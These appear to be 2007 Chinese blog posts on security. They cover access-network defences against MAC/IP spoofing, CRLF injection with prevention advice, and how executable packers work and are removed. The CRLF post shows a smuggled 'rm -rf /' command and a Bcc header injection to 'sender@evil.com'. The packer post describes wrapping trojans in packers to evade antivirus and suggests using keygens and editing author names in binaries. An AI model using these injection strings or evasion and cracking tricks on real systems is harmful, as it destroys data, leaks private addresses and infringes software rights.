前3種過量報文的處理步驟爲:匹配特定類型的報文,特征是:特定的協議報文、廣播報文(或者某種更具體特征的廣播報文)、組播報文(或者某種更具體特征的組播報文);統計此類報文的發送速率;如果發送速率超過預定義的速率,抛棄報文。</span><br /><span style="color:black;"> 處理過量協議、廣播和組播報文的技術又被稱爲報文抑制。</span><br /><span style="color:black;"> 解決過量源MAC地址問題比較簡單:可設定用戶側端口MAC地址個數的上限。這樣,一旦端口達到預定義的MAC地址個數,後續帶有新MAC地址的報文一律被丢棄。</span><br /><span style="color:black;"> 非法報文和過量報文的處理在接入網絡的各個層次都需要處理,但是對于接入節點,因爲其在接入網中的位置,上述功能的實現尤其顯得重要。</span><br /><br /><span style="color:black;"> <b>4.MAC/IP地址欺騙</b></span><br /><span style="color:black;"> MAC/IP地址欺騙是非常嚴重的安全威脅。</span><br /><span style="color:black;"> MAC地址欺騙的本質是會出現MAC地址重複,造成交換芯片MAC地址學習遷移,部分用戶無法上網。MAC地址欺騙可以分成下面兩種類型:</span><br /><span style="color:black;"> (1)用戶的MAC地址欺騙。</span><br /><span style="color:black;"> (2)上遊網絡業務服務器(如BRAS、DHCP服務器/中繼、默認網關等)的MAC地址欺騙。</span><br /><br /><span style="color:black;">因爲以太網自身的特點,MAC地址信息都是公開的,通過掃描工具,用戶可以較容易地獲取其他用戶的MAC地址信息。如果相同的MAC地址出現在設備的不同用戶端口上,就會造成MAC地址學習發生紊亂,導緻用戶無法上網。</span><br /><br /><span style="color:black;"> 爲了增強安全性,在接入網絡,一般要求在接入節點處實現用戶端口隔離:在同一個VLAN下的用戶之間相互不能通信,而隻能和上行彙聚端口互通。用戶端口隔離可以通過私有虛拟局域網(PVLAN)技術來實現。</span><br /><br /><span style="color:black;"> 不是所有的交換芯片都支持PVLAN的功能,即使支持PVLAN的功能,也有可能因爲設備MAC地址設置不當造成MAC地址重複問題,或者用戶通過其他渠道獲得其他用戶的MAC(比如“暴力”MAC嘗試<img src="http://www.nakuz.com/images/smilies/cry.gif" smilieid="4" alt="" border="0" />。PVLAN技術本身不足以完全解決用戶側MAC地址欺騙問題。解決用戶側MAC地址欺騙,有如下解決方法:</span><br /><br /><span style="color:black;"> (1)VMAC 在接入節點處,在上行方向,給每個<物理端口,MAC>分配或者生成一個獨一無二的VMAC地址。被解釋以後的MAC地址因爲是設備自己産生 的,因此是可信的,而且确保不會出現用戶側MAC地址重複的現象。使用VMAC地址代替報文的源MAC地址。下行方向,根據VMAC查找到對應的原始的 MAC地址,然後使用原始MAC地址代替VMAC地址。VMAC不僅僅可用來防止用戶MAC地址欺騙,還可防止對業務服務器MAC地址的欺騙,并且也可以 用于用戶端口識别。缺點是影響與MAC地址相關的協議,處理複雜。</span><br /><br /><span style="color:black;"> (2)MAC地址綁定。将MAC地址靜态綁定到用戶端口,如果數據報文的源MAC地址和綁定的MAC地址不同,則地址被丢棄。此方法雖簡單,但是可用性差。用戶自組網絡的MAC地址千差萬别,而且個數也不确定,如果采用靜态綁定,很難管理。</span><br /><br /><span style="color:black;"> (3)基于PPPoE會話(Session)感知的數據報文轉發,應用于PPPoE接入環境。每個用戶都對應唯一的PPPoE會話标識 (SessionID)。可以在接入節點上記錄一張表,上行直接彙聚,下行可以查看該表來進行數據轉發。這樣,數據報文的轉發完全可以不使用MAC地址, 也就不需要學習,從而也就不存在MAC地址重複問題。</span><br /><br /><span style="color:black;"> (4)基于IP感知的數據報文轉發。應用于IPoE的接入環境。在接入節點上,建立一張表,因爲IP是唯一的,所以不會存在IP重複的現象,數據報文下行轉發沒有問題。和基于PPPoE Session的數據報文轉發一樣,接入節點上也不需要MAC地址學習。</span><br /><br /><span style="color:black;">上述3、4兩種處理方法對接入節點歸屬的VLAN有一定的要求。如果一個接入節點屬于一個唯一的VLAN,那麽 隻要接入節點按照上述要求轉發數據報文即可。如果多個接入節點屬于一個VLAN,那麽需要保證彙聚這些接入節點的交換機也要按照上述的要求轉發下行數據報 文。利用PPPoE Session或者IP感知的方式和傳統的二層交換機的轉發機制有質的不同,一般的交換芯片難以實現,而且隻解決特定類型接入的MAC地址重複問題。優點 是不用修改數據報文,不會影響其他協議。 </span><br /><br /><br /><span style="color:black;"> 業務服務器的MAC地址欺騙将會使得網絡設備的業務服務器MAC地址學習發生遷移,從而造成設備下的部分用戶無法上網。業務服務器MAC地址防欺騙可以使用下面的技術來解決:</span><br /><br /><span style="color:black;"> (1)VMAC</span><br /><span style="color:black;"> 使用VMAC可以解決各種接入環境下的業務服務器MAC欺騙。</span><br /><br /><span style="color:black;"> (2)業務服務器MAC地址靜态配置</span><br /><span style="color:black;"> 手動将業務服務器的MAC配置到接入節點交換芯片的靜态MAC地址表上,這樣業務服務器MAC地址學習就不會發生遷移。這個方法雖然簡單,但靈活性和擴充性都很差。</span><br /><br /><span style="color:black;"> (3)業務服務器MAC地址自動配置</span><br /><span style="color:black;"> 這是本文提出的一種解決業務服務器MAC地址欺騙的方法。基本思想是,讓接入節點充當PPPoE或者DHCP客戶端,定期發起PPPoE或者DHCP請 求,這樣就可以動态地獲取BRAS和DHCP服務器/中繼的MAC地址。其優點非常明顯:可利用現有協議,不用手動配置,不修改數據報文,不影響其他協 議。</span><br /><br /><span style="color:black;"> IP欺騙存在于IPoE接入場景下,冒用他人IP地址,盜取服務,或者沒有通過DHCP獲得配置信息的情況下接入網絡,妨礙了運營商的統一管理。解決這個 問題需要在接入節點上實現“DHCP IP源警衛”,監聽來往于用戶和DHCP服務器/中繼的協議報文,在用戶沒有獲取配置信息以前,除了DHCP協議報文,其他上行報文統統抛棄。一旦監聽到 DHCP ACK報文,就綁定<分配的IP,用戶MAC>到用戶端口,使能上行數據報文的發送,同時保證上行數據報文的和綁定的<分配的IP,用 戶MAC>一緻。在DHCP租用到期後,取消這種捆綁,并停止上行非DHCP協議報文發送。</span><br /><br /><span style="color:black;"> <b>5.非法業務</b></span><br /><span style="color:black;"> 經過多年的接入網絡建設,對于運營商而言,接入帶寬已經不是主要的問題。當務之急,一是在現有網絡的基礎上,提供盡可能多的業務,改變目前僅靠接入和帶寬盈利的模式,改變粗放式的經營路線;另一個就是控制目前在已有網絡中存在的非法業務。</span><br /><br /><span style="color:black;">所謂的非法業務是從運營商的角度來判定的一些目前網絡上存在的部分數據服務。非法業務形式多種多樣,下面僅是其中幾例:</span><br /><span style="color:black;"> (1)P2P流下載。P2P流下載能大量吞噬寶貴的網絡帶寬,影響用戶上網。</span><br /><span style="color:black;"> (2)VoIP。VoIP分流運營商已有的公共交換電話網(PSTN)業務,可能嚴重損害其業務收益。</span><br /><span style="color:black;"> (3)用戶側私拉亂接。寬帶用戶以個人的身份申請業務,但給企業或黑網吧使用,或與其他家庭共用寬帶,從而損害運營商的業務收益。</span><br /><br /><span style="color:black;"> 不同于前面幾節的安全問題,非法業務具有非常複雜的業務特征,不可能通過簡單的特征提取方法來判定某數據報文是否屬于非法業務的報文。爲了檢測出某條數據流是否是非法業務,需要對數據流進行深度智能分析,依據預定義的特征信息庫,對數據流匹配才能判定。</span><br /><br /><span style="color:black;"> 用戶私拉亂接現象一般發生在用戶使用具有網絡地址轉換(NAT)功能的設備和接入節點對接情況下,上行數據報文從表面看起來好像從一個用戶發出的一樣。解 決這個問題需要收集各種“蛛絲馬迹”:分析傳輸控制協議(TCP)連接數量、網絡流量、源TCP端口範圍,這些信息有一定的參考價值;分析MSN、 Windows Update能攜帶的一些用戶特定信息;用戶上行數據流中,如OS版本、IE版本、用戶的行爲習慣等有用的用戶信息。往往需要結合部分或者全部特征,作出 綜合判斷,減少誤判和漏判。</span><br /><br /><span style="color:black;"> 非法VoIP檢測起來具有很大的難度,VoIP軟件數量衆多。爲了穿越防火牆或者NAT,防止被檢測,有些VoIP軟件甚至在特殊端口上啓動私有隧道來承 載VoIP相關數據。需要對數據報協議/傳輸控制協議(UDP/TCP)所有的數據流進行監控,利用VoIP注冊、呼叫、準入等特征來分析數據流。</span><br /><br /><span style="color:black;"> P2P流容易監控,因爲流行的P2P軟件數量有限,這些軟件所發出的數據報文的特征相對容易定義。</span><br /><br /><span style="color:black;"> 非法業務的檢測可以在接入網絡的各個層次進行。檢測點越往下遊偏移,“分布式處理”的特征越強烈,容易在性能上得到提升,但是在價格、檢測點協作和管理方面相對于集中式檢測來說稍稍略弱一點。</span><br /><br /><span style="color:black;"> 非法業務的檢測技術上具有智能化的趨勢。但是回報較高,因爲可以爲運營商創造更高的附加值。随着未來各種業務在寬帶接入網絡的興起,非法業務檢測将大有用武之地,代表着接入網絡安全研究的一個重要方向。</span><br /><br /><b><span style="color:black;">6.結束語</span></b><br /><span style="color:black;"> 對于接入網絡的商業應用,安全是一個重要的不容回避的問題,也是一個随着時間動态變化的課題。不僅運營商高度重視安全問題,網絡設備提供商對安全問題也異常重視,中興通訊提供的DSLAM和BRAS可以解決上述大部分接入網安全問題</span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-6805280662683038999?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-75208688813179506142007-08-22T01:47:00.001-07:002007-08-22T01:47:11.885-07:00CRLF注入攻擊的原理和其防範措施<div style="font-size: 12px;"><span style="font-size: 12px;"><span style="color:black;">CRLF注入攻擊并沒有像其它類型的攻擊那樣著名。但是,當對有安全漏洞的應用程序實施CRLF注入攻擊時,這種攻擊對于攻擊者同樣有效,并且對用戶造成極大的破壞。讓我們看看這些應用程序攻擊是如何實施的和你能 </span>夠采取什麽措施保護你的機構。<br /><span style="color:black;">CRLF的含義是“carriage return/line feed”,意思就是回車。這是兩個ASCII字符,分别排在第十三和第十位。CR和LF是在計算機終端還是電傳打印機的時候遺留下來的東西。電傳打字機 就像普通打字機一樣工作。在每一行的末端,CR命令讓打印頭回到左邊。LF命令讓紙前進一行。雖然使用卷紙的終端時代已經過去了,但是,CR和LF命令依 然存在,許多應用程序和網絡協議仍使用這些命令作爲分隔符。</span><br /><br /><span style="color:black;">攻擊者在搜索安全漏洞的時候沒有忽略很少使用的CRLF。攻擊者可以通過在一段數據中加入CRLF命令來改變接受這個數據的應用程序處理這個數據的方式,從而執行CFRL注入攻擊。</span><br /><br /><span style="color:black;">CRLF攻擊最基本的例子包括向記錄文件中增加僞造的記錄。也就是說,有安全漏洞的應用程序把一個用戶輸入的内容寫到系統記錄文件中。攻擊者可以提供如下輸入内容:</span><br /><br /><span style="color:black;">Testing123MYSQL DATABASE ERROR: TABLE CORRUPTION</span><br /><span style="color:black;">當系統管理員在早上查看他的紀錄時,他可能會用很多時間排除一個根本就不存在的故障。狡猾的攻擊者在攻擊系統的另一部分時,可以使用這種特洛伊木馬分散管理員的注意力。</span><br /><br /><span style="color:black;">想像一下,一個應用程序收到用戶輸入的一個文件名,然後對那個文件執行一個指令,如“ls -a .”。如果這個應用程序存在CRLF安全漏洞,攻擊者就可以輸入這樣的内容:</span><br /><span style="color:black;">File.txtrm -rf /</span><br /><span style="color:black;">這個有安全漏洞的應用程序就會執行這個命令“ls -a File.txt”,然後再執行這個命令“rm -rf /”。如果這個應用程序是一個根程序,這可能就是它執行的最後一個命令,因爲在根分區的全部文件都被删除了。</span><br /><br /><span style="color:black;">考慮使用一種CRFL注入攻擊暴露使用一種基于網絡的匿名電子郵件系統的某個人的電子郵件地址。那個電子郵件系 統的工作方式可能是這樣的:電子郵件的發送者用他們的電子郵件地址、信息主題和信息本身填寫一個表格。當這個表格遞交到網絡服務器上的時候,網絡服務器把 這個表格轉換爲一個SMTP電子郵件,并且發送給收件人。發送者永遠不會看到收件人的電子郵件地址。這個地址隻有服務器知道。</span><br /><br /><span style="color:black;">如果這個應用程序存在CRLF攻擊安全漏洞,電子郵件的發件人可以通過創建下面這樣的一行主題來破壞收件人的匿名性:</span><br /><span style="color:black;">Subject: Peekaboo, I see youBcc: <a href="mailto:sender@evil.com">sender@evil.com</a></span><br /><span style="color:black;">當有安全漏洞的應用程序得到這個數據的時候,它向這個郵件的文件頭增加一個不需要的行,創建一個發送到發件人郵件地址的這封郵件的盲送副本。在這個副本中,“To:”地址是看不到的,因此把收件人的郵件地址暴露給發送者。</span><br /><br /><span style="color:black;">使用良好的編程技術能夠避免包括CRLF攻擊在内的注入攻擊。要使你的應用程序不受CRFL注入攻擊,需要你保 持與防禦SQL注入攻擊等其它類型的注入攻擊一樣的警惕性:永遠不要相信輸入的内容!在你控制範圍以外的任何來源的輸入内容都必須要進行檢查,在你的應用 程序對數據執行操作之前,任何不符合預期的數據類型的字符都要删除。例如,如果你期待着一個電子郵件主題行,這個數據中的所有的字符都應該是字母、數字和 标點符号。如果你的應用程序期待着一個文件名,這個數據中隻能包含合法地在文件名中使用的字符。如果程序員在這兩個例子的情況下簡單地過濾掉CR和LF字 符,這個攻擊就失敗了。</span><br /><br /><span style="color:black;">用戶輸入是“壞字符”的一個來源。但是,你不要忘記檢查你從來沒有編寫過的其它程序輸入的内容。在許多情況下, 攻擊者可以把一個注入攻擊從一個有漏洞的應用程序轉移到一個基本的例行程序中。程序員不會檢查基本的例行程序中的數據,因爲那裏的數據不是直接來自于用 戶。你要把任何你不能跟蹤到可信賴的來源的數據都當作被感染的數據。這樣,你就安全了。</span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-7520868881317950614?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-22728055110847955732007-08-22T01:46:00.005-07:002007-08-22T01:46:58.727-07:00病毒加殼技術與脫殼殺毒方法<span style="font-size: 12px;"><span style="color:black;">殼是什麽?脫殼又是什麽?這是很多經常感到迷惑和經常提出的問題,其實這個問題一點也不幼稚。當你想聽說脫殼這個名詞并試着去了解的時候,說明你已經在各個安全站點很有了一段日子了。下面,我們進入“殼”的世界吧。 </span><br /><br /><span style="color:black;"><b>一、金蟬脫殼的故事</b> </span><br /><span style="color:black;">我先想講個故事吧。那就是金蟬脫殼。金蟬脫殼屬于三十六計中的混戰計。金蟬脫殼的本意是:寒蟬在蛻變時,本體脫 離皮殼而走,隻留下蟬蛻還挂在枝頭。此計用于軍事,是指通過僞裝擺脫敵人,撤退或轉移,以實現我方的戰略目标的謀略。穩住對方,撤退或轉移,決不是驚慌失 措,消極逃跑,而是保留形式,抽走内容,穩住對方,使自己脫離險境達到己方戰略目标,己方常常可用巧妙分兵轉移的機會出擊另一部分敵人。三國時期,諸葛亮 六出祁山,北伐中原,但一直未能成功,終于在第六次北伐時,積勞成疾,在五丈原病死于軍中。 維遵照諸葛亮的吩咐,在諸葛亮死後,秘不發喪,對外嚴密封鎖消息。他帶着靈柩,秘密率部撤退。司馬懿派部隊跟蹤追擊蜀軍。姜維命工匠仿諸葛亮摸樣,雕了一 個木人,羽扇綸巾,穩坐車中。并派楊儀率領部分人馬大張旗鼓,向魏軍發動進攻。魏軍遠望蜀軍,軍容整齊,旗鼓大張,又見諸葛亮穩坐車中,指揮若定,不知蜀 軍又耍什麽花招,不敢輕舉妄動。司馬懿一向知道諸葛亮“詭計多端”,又懷疑此次退兵乃是誘敵之計,于是命令部隊後撤,觀察蜀軍動向。姜維趁司馬懿退兵的大 好時機,馬上指揮主力部隊,迅速安全轉移,撤回漢中。等司馬懿得知諸葛亮已死,再進兵追擊,爲時已晚。相信這個故事,大家在大型連續劇《三國演義》裏已經 看過了。呵呵,隻是沒有理解得這麽深入罷了!而在黑客入侵技術中,金蟬脫殼則是指:删除系統運行日志 攻擊者攻破系統後,常删除系統運行日志,隐藏自己的痕迹...呵呵 </span><br /><br /><span style="color:black;"><b>二、殼,脫殼,加殼</b> </span><br /><span style="color:black;">在自然界中,我想大家對殼這東西應該都不會陌生了,由上述故事,我們也可見一斑。自然界中植物用它來保護種子, 動物用它來保護身體等等。同樣,在一些計算機軟件裏也有一段專門負責保護軟件不被非法修改或反編譯的程序。它們一般都是先于程序運行,拿到控制權,然後完 成它們保護軟件的任務。就像動植物的殼一般都是在身體外面一樣理所當然(但後來也出現了所謂的“殼中帶籽”的殼)。由于這段程序和自然界的殼在功能上有很 多相同的地方,基于命名的規則,大家就把這樣的程序稱爲“殼”了。就像計算機病毒和自然界的病毒一樣,其實都是命名上的方法罷了。 從功能上抽象,軟件的殼和自然界中的殼相差無幾。無非是保護、隐蔽殼内的東西。而從技術的角度出發,殼是一段執行于原始程序前的代碼。原始程序的代碼在加 殼的過程中可能被壓縮、加密……。當加殼後的文件執行時,殼-這段代碼先于原始程序運行,他把壓縮、加密後的代碼還原成原始程序代碼,然後再把執行權交還 給原始代碼。 軟件的殼分爲加密殼、壓縮殼、僞裝殼、多層殼等類,目的都是爲了隐藏程序真正的OEP(入口點,防止被破解)。關于“殼”以及相關軟件的發展曆史請參閱吳 先生的《一切從“殼”開始》。 </span><br /><br /><span style="color:black;"><b>(一)殼的概念</b> </span><br /><span style="color:black;">作者編好軟件後,編譯成exe可執行文件。 1.有一些版權信息需要保護起來,不想讓别人随便改動,如作者的姓名,即爲了保護軟件不被破解,通常都是采用加殼來進行保護。 2.需要把程序搞的小一點,從而方便使用。于是,需要用到一些軟件,它們能将exe可執行文件壓縮, 3.在黑客界給木馬等軟件加殼脫殼以躲避殺毒軟件。實現上述功能,這些軟件稱爲加殼軟件。 </span><br /><br /><span style="color:black;"><b>(二)加殼軟件最常見的加殼軟件</b> </span><br /><span style="color:black;">ASPACK ,UPX,PEcompact 不常用的加殼軟件WWPACK32;PE-PACK ;PETITE NEOLITE </span><br /><br /><span style="color:black;"><b>(三)偵測殼和軟件所用編寫語言的軟件</b> </span><br /><span style="color:black;">因爲脫殼之前要查他的殼的類型。 </span><br /><span style="color:black;">1.偵測殼的軟件fileinfo.exe 簡稱fi.exe(偵測殼的能力極強)。 </span><br /><span style="color:black;">2.偵測殼和軟件所用編寫語言的軟件language.exe(兩個功能合爲一體,很棒),推薦language2000中文版(專門檢測加殼類型)。 </span><br /><span style="color:black;">3.軟件常用編寫語言Delphi,VisualBasic(VB)---最難破,VisualC(VC)。 </span><br /><br /><span style="color:black;"><b>(四)脫殼軟件</b> </span><br /><span style="color:black;">軟件加殼是作者寫完軟件後,爲了保護自己的代碼或維護軟件産權等利益所常用到的手段。目前有很多加殼工具,當然 有盾,自然就有矛,隻要我們收集全常用脫殼工具,那就不怕他加殼了。軟件脫殼有手動脫和自動脫殼之分,下面我們先介紹自動脫殼,因爲手動脫殼需要運用彙編 語言,要跟蹤斷點等,不适合初學者,但我們在後邊将稍作介紹。 </span><br /><br /><span style="color:black;">加殼一般屬于軟件加密,現在越來越多的軟件經過壓縮處理,給漢化帶來許多不便,軟件漢化愛好者也不得不學習掌握 這種技能。現在脫殼一般分手動和自動兩種,手動就是用TRW2000、TR、SOFTICE等調試工具對付,對脫殼者有一定水平要求,涉及到很多彙編語言 和軟件調試方面的知識。而自動就是用專門的脫殼工具來脫,最常用某種壓縮軟件都有他人寫的反壓縮工具對應,有些壓縮工具自身能解壓,如UPX;有些不提供 這功能,如:ASPACK,就需要UNASPACK對付,好處是簡單,缺點是版本更新了就沒用了。另外脫殼就是用專門的脫殼工具來對付,最流行的是 PROCDUMP v1.62 ,可對付目前各種壓縮軟件的壓縮檔。在這裏介紹的是一些通用的方法和工具,希望對大家有幫助。我們知道文件的加密方式,就可以使用不同的工具、不同的方法 進行脫殼。下面是我們常常會碰到的加殼方式及簡單的脫殼措施,供大家參考: 脫殼的基本原則就是單步跟蹤,隻能往前,不能往後。脫殼的一般流程是:查殼->尋找OEP->Dump->修複 找OEP的一般思路如下: 先看殼是加密殼還是壓縮殼,壓縮殼相對來說容易些,一般是沒有異常,找到對應的popad後就能到入口,跳到入口的方式一般爲。 我們知道文件被一些壓縮加殼軟件加密,下一步我們就要分析加密軟件的名稱、版本。因爲不同軟件甚至不同版本加的殼,脫殼處理的方法都不相同。</span><br /><br /><span style="color:black;">常用脫殼工具:1、文件分析工具(偵測殼的類型):Fi,GetTyp,peid,pe-scan, 2、OEP入口查找工具:SoftICE,TRW,ollydbg,loader,peid 3、dump工具:IceDump,TRW,PEditor,ProcDump32,LordPE 4、PE文件編輯工具PEditor,ProcDump32,LordPE 5、重建Import Table工具:ImportREC,ReVirgin 6、ASProtect脫殼專用工具:Caspr(ASPr V1.1-V1.2有效),Rad(隻對ASPr V1.1有效),loader,peid(1)Aspack: 用的最多,但隻要用UNASPACK或PEDUMP32脫殼就行了 (2)ASProtect+aspack:次之,國外的軟件多用它加殼,脫殼時需要用到SOFTICE+ICEDUMP,需要一定的專業知識,但最新版現 在暫時沒有辦法。 (3)Upx: 可以用UPX本身來脫殼,但要注意版本是否一緻,用-D 參數 (4)Armadill: 可以用SOFTICE+ICEDUMP脫殼,比較煩 (5)Dbpe: 國内比較好的加密軟件,新版本暫時不能脫,但可以破解 (6)NeoLite: 可以用自己來脫殼 (7)Pcguard: 可以用SOFTICE+ICEDUMP+FROGICE來脫殼 (8)Pecompat: 用SOFTICE配合PEDUMP32來脫殼,但不要專業知識 (9)Petite: 有一部分的老版本可以用PEDUMP32直接脫殼,新版本脫殼時需要用到SOFTICE+ICEDUMP,需要一定的專業知識 (10)WWpack32: 和PECOMPACT一樣其實有一部分的老版本可以用PEDUMP32直接脫殼,不過有時候資源無法修改,也就無法漢化,所以最好還是用SOFTICE配 合 PEDUMP32脫殼 我們通常都會使用Procdump32這個通用脫殼軟件,它是一個強大的脫殼軟件,他可以解開絕大部分的加密外殼,還有腳本功能 可以使用腳本輕松解開特定外殼的加密文件。另外很多時候我們要用到exe可執行文件編輯軟件ultraedit。我們可以下載它的漢化注冊版本,它的注冊 機可從網上搜到。ultraedit打開一個中文軟件,若加殼,許多漢字不能被認出 ultraedit打開一個中文軟件,若未加殼或已經脫殼,許多漢字能被認出 ultraedit可用來檢驗殼是否脫掉,以後它的用處還很多,請熟練掌握例如,可用它的替換功能替換作者的姓名爲你的姓名注意字節必須相等,兩個漢字替 兩個,三個替三個,不足處在ultraedit編輯器左邊用00補。</span><br /><br /><span style="color:black;"><b>常見的殼脫法:</b> </span><br /><span style="color:black;">(一)aspack殼 脫殼可用unaspack或caspr 1.unaspack ,使用方法類似lanuage,傻瓜式軟件,運行後選取待脫殼的軟件即可. 缺點:隻能脫aspack早些時候版本的殼,不能脫高版本的殼 2.caspr第一種:待脫殼的軟件(如aa.exe)和caspr.exe位于同一目錄下,執行windows起始菜單的運行,鍵入 caspr aa.exe脫殼後的文件爲aa.ex_,删掉原來的aa.exe,将aa.ex_改名爲aa.exe即可。使用方法類似fi 優點:可以脫aspack任何版本的殼,脫殼能力極強缺點:Dos界面。第二種:将aa.exe的圖标拖到caspr.exe的圖标上***若已偵測出是 aspack殼,用unaspack脫殼出錯,說明是aspack高版本的殼,用caspr脫即可。 </span><br /><span style="color:black;">(二)upx殼 脫殼可用upx待脫殼的軟件(如aa.exe)和upx.exe位于同一目錄下,執行windows起始菜單的運行,鍵入upx -d aa.exe。 </span><br /><span style="color:black;">(三)PEcompact殼 脫殼用unpecompact 使用方法類似lanuage傻瓜式軟件,運行後選取待脫殼的軟件即可。 </span><br /><span style="color:black;">(四)procdump 萬能脫殼但不精,一般不要用 使用方法:運行後,先指定殼的名稱,再選定欲脫殼軟件,确定即可脫殼後的文件大于原文件由于脫殼軟件很成熟,手動脫殼一般用不到。 </span><br /><br /><span style="color:black;"><b>三、壓縮與脫殼</b> </span><br /><span style="color:black;">現在脫殼一般分手動和自動兩種,手動就是用TRW2000、TR、SOFTICE等調試工具對付,對脫殼者有一 定水平要求。而自動就稍好些,用專門的脫殼工具來脫,最常用某種壓縮軟件都有他人寫的反壓縮工具對應,有些壓縮工具自身能解壓,如UPX;有些不提供這功 能,如:ASPACK,就需要UNASPACK對付。很多文件使用了一些壓縮加殼軟件加密過,這就需要對文件進行解壓脫殼處理後,才能漢化。這種壓縮與我 們平時接觸的壓縮工具如winzip,winrar等壓縮不同,winzip和winrar等壓縮後的文件不能直接執行,而這種 EXE 壓縮軟件,EXE文件壓縮後,仍可以運行。這種壓縮工具把文件壓縮後,會在文件開頭一部分,加了一段解壓代碼。執行時該文件時,該代碼先執行解壓還原文 件,不過這些都是在内存中完成的,由于微機速度快,我們基本感覺不出有什麽不同。這樣的程序很多,如 The bat,Acdsee,Winxfile等等。</span><br /><br /><span style="color:black;">要脫殼就應先了解常用壓縮工具有哪些,這樣知己知彼,如今越來越多的軟件商喜歡用壓縮方式發行自己的産品,如 The bat!用UPX壓縮,ACDSEE3.0用ASPACK壓縮等。它有以下因素:一是:微機性能越來越好,執行過程中解壓使人感覺不出來,用戶能接受(給 軟件加殼,類似WINZIP 的效果,隻不過這個加殼壓縮之後的文件,可以獨立運行,解壓過程完全隐蔽,都在内存中完成。解壓原理,是加殼工具在文件頭裏加了一段指令,告訴CPU,怎 麽才能解壓自己。現在的CPU都很快,所以這個解壓過程你看不出什麽異常。因爲軟件一下子就打開了,隻有你機器配置非常差,才會感覺到不加殼和加殼後的軟 件運行速度的差别。)。 二是:壓縮後軟件體積縮小,便于網絡傳輸。三是:增加破解的難度。首先,加殼軟件不同于一般的winzip,winrar等壓縮 軟件.它是壓縮exe可執行文件的,壓縮後的文件可以直接運行.而winzip,winrar等壓縮軟件可壓縮任何文件,但壓縮後不能直接運行。很多站點 不允許上傳可執行文件,而隻能上傳壓縮的文件,一方面處于速度考慮,也是爲了安全性考慮。用加殼軟件壓縮的文件就是體積縮小,别的性質沒改變。還是EXE 文件,仍可執行,隻是運行過程和以前不一樣了。壓縮工具把文件壓縮後,在文件開頭一部分,加了一段解壓代碼。執行時該文件時,該代碼先執行解壓還原文件, 不過這些都是在内存中完成的,由于微機速度快,我們基本感覺不出有什麽不同。 </span><br /><br /><span style="color:black;"><b>四﹑加殼與木馬</b> </span><br /><span style="color:black;">木馬危害無窮,但是随着人們對各種木馬知識的了解,殺毒和專殺工具的特殊照顧,使得很多木馬無藏身之地,但很多 高手到處賣馬,号稱不會被查殺。它們究竟是如何躲在我們的系統中的呢? 其實無非對木馬進行“加/脫殼”。對于黑客來說,加/脫殼技術被淋漓盡緻地應用到了僞裝木馬客戶端上,目的是爲了防止被殺毒軟件反跟蹤查殺和被跟蹤調試, 同時也防止算法程序被别人靜态分析。最基本的隐藏:不可見窗體+隐藏文件。木馬程序 </span><br /><br /><span style="color:black;">采用“進程隐藏”技術: 第一代進程隐藏技術:Windows 98的後門 。第二代進程隐藏技術:進程插入,以及 其後的Hook技術之外就是跟殺毒軟件對着幹:反殺毒軟件外殼技術了。木馬再狡猾,可是一旦被殺毒軟件定義了特征碼,在運行前就被攔截了。要躲過殺毒軟件 的追殺,很多木馬就被加了殼,相當于給木馬穿了件衣服,這樣殺毒軟件就認不出來了,但有部分殺毒軟件會嘗試對常用殼進行脫殼,然後再查殺(小樣,别以爲穿 上件馬夾我就不認識你了)。除了被動的隐藏外,最近還發現了能夠主動和殺毒軟件對着幹的殼,木馬在加了這種殼之後,一旦運行,則外殼先得到程序控制權,由 其通過各種手段對系統中安裝的殺毒軟件進行破壞,最後在确認安全(殺毒軟件的保護已被瓦解)後由殼釋放包裹在自己“體内”的木馬體并執行之。對付這種木馬 的方法是使用具有脫殼能力的殺毒軟件對系統進行保護。殼能夠将文件(比如EXE)包住,然後在文件被運行時,首先由殼獲得控制權,然後釋放并運行包裹着的 文件體。很多殼能對自己包住的文件體進行加密,這樣就可以防止殺毒軟件的查殺。比如原先殺毒軟件定義的該木馬的特征是“12345”,如果發現某文件中含 有這個特征,就認爲該文件是木馬,而帶有加密功能的殼則會對文件體進行加密(如:原先的特征是“12345”,加密後變成了“54321”,這樣殺毒軟件 當然不能靠文件特征進行檢查了)。脫殼指的就是将文件外邊的殼去除,恢複文件沒有加殼前的狀态。 </span><br /><br /><br /><span style="color:black;">雖然很多殺毒軟件的文件監控都會使程序首次運行時速度很慢。這是因爲:殺毒軟件對壓縮加殼的exe文件監控掃描 時,都要先“脫殼”。一般壓縮加殼程序,可加密壓縮可執行文件的代碼、數據、輸入表、重定位表、資源段。通常壓縮後的文件大小隻有原來的50%-70%, 但不影響程序的正常使用和所有功能,目的是保護文件不被跟蹤分析,反彙編,脫殼等。所以有時候使用某軟件給木馬脫殼會失敗,但可換個軟件試下。脫殼後重新 加殼或者使用不同加殼的軟件給木馬加多層殼,均有可能欺騙殺毒軟件,但在經過複雜的多重加殼後,檢測出的結果就不一定準确了,此時就需要 “adv.scan”高級掃描, pe-scan會分析出被各種加殼工具加殼的可能性。 </span><br /><br /><span style="color:black;"><b>五﹑加殼與病毒</b> </span><br /><span style="color:black;">病毒要想生存,除了增加自身的變形能力以外,還可與程序加殼壓縮聯系起來。我們先來看看病毒變形的目的,因爲現 在的反病毒軟件,基于特征碼檢測,增加變形能力,使得特征碼檢測方法更加困難。那麽,如果再和程序加殼技術結合起來,那麽将使的單單通過添加特征碼方法解 毒徹底失效,解毒時,必須同時更新掃描引擎,而現在并沒有通用的解殼方法。因此加殼壓縮和變形結合起來,将使得反病毒廠商手忙腳亂,也使得反病毒軟件用戶 痛苦不堪,頻繁的更新,除了特征碼,還有掃描引擎。給平常的病毒加個殼,比如用upx,現在通常反病毒軟件,對于常用的加密加殼壓縮程序,都有相應的解殼 程序。效果并不好,所以如果病毒本是既是一好的變形加密加殼壓縮程序,那麽,目的是強迫更新掃描引擎,當然也是可以被動态解壓檢測出來的,隻是增加了解毒 的很多工作量。實際上加殼技術不僅僅用于軟件保護,也可用于好的病毒。好的病毒不一定要非常快的傳播速度,難于檢測,難于查殺更重要一些,就像現在殺毒界 